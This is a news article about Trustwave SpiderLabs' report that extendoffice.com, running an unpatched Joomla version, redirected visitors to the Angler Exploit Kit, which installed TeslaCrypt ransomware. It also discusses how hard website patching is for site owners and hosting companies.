SpiderLabs, the ethical hacker team inside Trustwave has revealed a compromised website has been serving up malware including the TeslaCrypt ransomware. The site has been identified as www.extendoffice.com who SpiderLabs researchers claim failed to properly patch their website software.
According to the blog post from Trustwave researcher Rami Kogan, visitors to extendoffice website were being redirected to a site where they were exposed to the Angler Exploit Kit. Those visitors who were not protected against this malware were infected with the TeslaCrypt ransomware. It is not yet known how many people have been infected and had their files locked by Kogan believes it could be millions of users.
As with all numbers around malware infections there is a lot of speculation and assumption going on here. Kogan says that by using the ranking of extendoffice by Alexa it is likely that over a million visitors per month would have been redirected to the malware. What cannot be known is how many of these were ultimately infected although the Angler Exploit Kit has a reputation among security researchers of being very effective.
SpiderLabs blame poor patching
In Kogan’s blog he points out that a daily check of telemetry data from Trustwave customers alerted the SpiderLabs team to something being wrong. A check of the data showed that this had been going on for a couple of weeks at least and this led the team to do further research.
What they discovered was that extendoffice was still using a old version of Joomla that was known to be susceptible to a injection script attack. A patch for this was issued in December but not until it had been successfully exploited on other sites. Kogan says that the code installed on the extendoffice website had been obfuscated to make it harder to spot. He then talks in his blog about some of the things that they had done to bypass security engines.
There are two big unknowns here:
- When was extendoffice first compromised? Without knowing this it is impossible to begin to estimate the number of potential victims.
- Were versions of Trustwave’s own products susceptible to being bypassed by this attack prior to February 6th? It would be useful to know if Trustwave would have detected the redirect before February 6th or if this is the date they patched their customer installs and therefore started to receive telemetry.
In the blog Kogan says that despite contacting extendoffice and their hosting company they received no acknowledgement from either. However, he did say that a recent check on the site showed the problem had been solved and the website cleaned.
It is an ongoing battle for most websites to defend against the range of attacks directed at them. The more successful they are the more likely they are to attract unwanted attention. Too many website owners seem to have little security processes that control when and how they patch. This is not an easy thing to solve. Over times sites become more complex and patching can easily break functionality which could result in the loss of customers.
There is also a problem for hosting vendors in that they cannot just take responsibility for patching . If they were to unilaterally apply updates they could break a customer website and that would leave them open to the risk of a lawsuit. What this means is that there is a need for better coordination between website administrators and hosting companies.
For extendoffice this is a major embarrassment and it will take time before we know all the facts in this case.